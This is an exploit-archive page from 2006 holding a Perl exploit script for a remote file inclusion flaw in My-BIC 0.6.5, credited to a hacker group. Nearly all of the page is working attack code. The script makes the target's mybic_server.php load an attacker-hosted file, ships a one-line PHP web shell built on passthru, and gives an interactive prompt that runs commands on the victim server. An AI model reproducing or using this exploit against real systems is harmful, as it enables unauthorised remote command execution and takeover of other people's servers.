Home / exploitsPDF  

mybic065-rfi.pl.txt

Posted on 18 November 2006

#!/usr/bin/perl # My-BIC => 0.6.5 Remote File Include Vulnerability Exploit # Script.............. : My-BIC # Expl0iter.... : the_Edit0r # Location .......... : Iran # Class.............. : Remote # Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8) # We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r # D3vil_B0y_ir , Tornado , DarkAngel , Behbood # <Spical TNX Irania Hackers : # ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers # Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar ) use LWP::Simple; print "............................................................... "; print ". . "; print ". My-BIC => 0.6.5 Remote File Include Vulnerability . "; print ". . "; print "............................................................... "; print ". . "; print ". Xmors NetWork Security TeaM . "; print ". Discovered By : the_Edit0r . "; print ". . "; print "............................................................... "; print ". . "; print ". Www.Xmors.coM (Pablic ) . "; print ". www.Xmors.neT ( Pirv8 ) . "; print "............................................................... "; print " "; print " I Love HacK & SecUrity "; print " "; my $kw3,$path,$shell,$conexiune,$cmd,$data ; if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);} $path = $ARGV[0]; chomp($path); $shell = $ARGV[1]; chomp($shell); $path = $path."mybic_server.php?INC_PATH="; sub usage(){ print "Usage : perl $0 host/path http://site.com/cmd.txt "; print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt "; print 'Shell : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>'; } while () { print "[the_Edit0r]"; chomp($cmd=<STDIN>); if ($cmd eq "exit") { exit(0);} $kw3 = $path."?lan=".$shell."?&cmd=".$cmd; if ($cmd eq "") { print "Enter your command ! "; } else { $data=get($kw3); print $data ; } }

 

TOP